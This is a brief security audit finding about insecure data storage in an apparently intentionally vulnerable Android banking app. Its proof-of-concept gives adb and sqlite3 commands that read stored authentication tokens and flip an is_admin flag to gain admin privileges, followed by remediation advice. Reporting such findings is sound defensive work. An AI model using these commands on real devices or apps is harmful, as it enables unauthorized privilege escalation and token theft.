Findings:
1. Insecure Data Storage (M2)
Description: Sensitive data, including authentication tokens and authorization flags like is_admin, were found stored in plain text within a local SQLite database.
Impact: Local attackers with access to the device can manipulate the SQLite database and gain unauthorized privileges.
Proof Of Concept (PoC)
adb shell
cd /data/data/com.vulnerablebankapp/databases/
sqlite3 catalystLocalStorage
> SELECT * FROM catalystLocalStorage;
> UPDATE catalystLocalStorage SET value='true' WHERE key='is_admin'
Recommendation:
Avoid storing authorization flags on the client side.
Store all sensitive data securely using encrypted storage or server-side validation.































